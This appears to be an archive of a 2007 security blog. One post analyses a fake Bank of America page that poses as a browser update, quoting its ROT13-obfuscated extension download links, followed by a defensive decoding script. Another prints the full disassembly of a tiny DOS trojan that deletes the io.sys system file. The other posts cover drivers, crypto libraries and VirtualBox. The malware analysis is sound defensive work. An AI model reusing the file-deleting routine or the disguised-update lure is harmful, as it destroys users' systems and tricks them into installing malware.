[MALWARE] Bank Of America Virus!!

September 29, 2007

Warning: This post contains Malware, pay attention!!!!

The site hxxp://bankofamerica.ulmb.com/do.php?cmd=SignIn (spread via spam mail) contains malware that is not explicitly linked.
I used Malzilla to inspect the URL content, and a suspicious message appears:

Browser Update Required!

This web site uses functions which is not compatible with your current browser version To update your browser please install the requiredupdate to view this page.

It is very strange that no compatibility checks are performed before this message, so let’s inspect further.

<script type="text/javascript">

var myf_1 = 60;

var myf_10 = "1";
var myf_11 = "82SSN573-38NN-482N-99NQ-91S697O91631";
var myf_12 = "uggc://jjj.svyr2lbh.arg/nccyrg.pno";

These two strings seem to be obfuscated links. Looking at the rest of the evil code, there is a function dc(str) that decodes an encrypted string with an easy algorithm (ROT-13 encryption), followed by the functions install_ff_result() and install_ff_ext(), which install a Firefox extension.

Now, the extension file is taken from a suspect source, file2you, a bit poor for Bank of America, don’t you think? 🙂

So let’s see what the obfuscated links are:

hxxp://www.file2you.net/{censored against lamah}.cab


hxxp://www.file2you.net/{censored or lamah}.xpi

Both of these links contain the same malware.
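
The decoding step described above, as an added example (not code from the original post or from the malicious page): a small Node.js triage script that applies ROT13 to the quoted string literals, classifies each result and defangs any URL before it is written into notes. The names `triage`, `defang` and the embedded `SNIPPET` are assumptions constructed from the variable lines shown earlier; the output shows that `myf_11` decodes to a GUID-shaped value, while `myf_12` decodes to a URL on file2you.

```javascript
// Added example: static triage of the obfuscated string literals quoted in the post.
// SNIPPET is constructed from the variable lines shown above; nothing is fetched.
const SNIPPET = `
var myf_1 = 60;
var myf_10 = "1";
var myf_11 = "82SSN573-38NN-482N-99NQ-91S697O91631";
var myf_12 = "uggc://jjj.svyr2lbh.arg/nccyrg.pno";
`;

// ROT13 rotates ASCII letters only; digits and punctuation pass through unchanged.
function rot13(s) {
  return s.replace(/[A-Za-z]/g, (ch) => {
    const base = ch <= "Z" ? 65 : 97;
    return String.fromCharCode(((ch.charCodeAt(0) - base + 13) % 26) + base);
  });
}

// Make a URL non-clickable before it goes into a report or ticket.
function defang(url) {
  return url.replace(/^http/i, "hxxp").replace(/\./g, "[.]");
}

const GUID_RE = /^[0-9A-F]{8}(-[0-9A-F]{4}){3}-[0-9A-F]{12}$/i;
const URL_RE = /^https?:\/\/[^\s"']+$/i;

// Decode every quoted string assigned to a variable and keep the ones that
// only become meaningful (URL or GUID) after ROT13.
function triage(source) {
  const findings = [];
  const literal = /var\s+(\w+)\s*=\s*"([^"]*)"/g;
  for (const [, name, raw] of source.matchAll(literal)) {
    const decoded = rot13(raw);
    if (URL_RE.test(decoded)) {
      findings.push({ name, kind: "url", value: defang(decoded) });
    } else if (GUID_RE.test(decoded) && !GUID_RE.test(raw)) {
      findings.push({ name, kind: "guid", value: decoded.toUpperCase() });
    }
  }
  return findings;
}

for (const f of triage(SNIPPET)) {
  console.log(`${f.name}\t${f.kind}\t${f.value}`);
}
```
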

In the next post, I’ll report what this malware Firefox extension does.

See you in the next post 🙂

KMDF’s NTSTATUS Return Values

September 29, 2007

It frequently happens that KMDF functions return strange status values that can’t be found in NtStatus.h, which causes newbie KMDF coders some confusion. The solution is easy: just take a look at \inc\wdf\kmdf\10\wdfstatus.h 😉

See you in the next post 🙂

[Malware] Trojan.DOS.DelIosys.b

September 28, 2007

This morning I received, among the classic spam, a little attachment that contains an old virus, so I dissected it:

seg000:0100 mov ax, 4301h
seg000:0103 mov dx, 114h
seg000:0106 mov cx, 6
seg000:0109 int 21h ; DOS - 2+ - SET FILE ATTRIBUTES
seg000:0109 ; DS:DX -> ASCIZ file name
seg000:0109 ; CX = file attribute bits
seg000:010B jb short locret_10113
seg000:010D mov ah, 41h
seg000:010F int 21h ; DOS - 2+ - DELETE A FILE (UNLINK)
seg000:010F ; DS:DX -> ASCIZ pathname of file to delete
seg000:0111 jb short $+2
seg000:0113 retn
seg000:0113 start endp

The file is a little COM executable for MS-DOS that uses two elementary interrupt calls, one to set file attributes and another to delete a file (the ASCIZ pathname in this case points to the io.sys system file).

This malware is identified by the major antivirus products as Trojan.DOS.DelIosys.b

File Size: 30 Bytes

MD5 Hash: ff0a232cf3720c75c88552a52d9ea72f

SHA1 Hash: 68e3bdf93f88bf2ff0c2a1e4ca96ddb190ab9835

It’s incredible how old Viruses are still around the web!

See you in the next post 🙂

BouncyCastle Experiment Good Results #2

September 27, 2007

Good news from my BouncyCastle Crypto Libs.

I’ve just finished the MultiHasher experiment. Because of a lack of documentation I wasn’t sure about the I/O functions, but Peter Dettman clarified something for me:

For the byte encoding of the string, the classical Encoder class of System.ComponentModel can be used, in this way:

InputBuffer = Encod.GetBytes(YourString);

UTF8Encoding is used instead of ASCII encoding:

textBox1.Text = Encod.GetString(Hex.Encode(outBuffer));

See you in the next post 🙂

[VirtualBox] Xp Installation Problems

September 26, 2007

Today I installed an XP VM powered by VirtualBox, but initially I encountered a problem that blocked the installation.

As indicated by VBox, I chose 192 MB for the VM’s memory, but at the NTFS formatting step VBox shuts down with the following error:


So I set the memory to 125 MB and the installation worked fine.

Remember: don’t believe the indicated memory usage 😉

See you in the next post 🙂

First Experiments with BouncyCastle CryptoLib

September 25, 2007

These days I’m experimenting with a promising library that implements many crypto algorithms, called BouncyCastle (which is for .NET, and I’m coding in C#).

The library seems to be complete and to have good implementations of common algorithms, elliptic curve cryptography, certifications, OpenPGP and OpenSSL.

Apart from a small lack of performance in the ECIES algorithm, it seems to work great.

The big problem is that the hex conversion functions have some problems; for example, Hex.Decode() fails when the string passed has an odd length.

Today I sent an email to the coders and hope for a fast reply. If I discover how to solve the other minor problems too (no time to mention them all right now), I’ll post the fixed piece of code here 😉

See you in the next post 🙂

Attacking MultiCore CPUs

September 25, 2007

Recently an interesting security flaw and realtu for multi-core CPUs was published. Here you can find a generic overview, and here a more detailed description of the vulnerability 🙂

See you in the next post! 🙂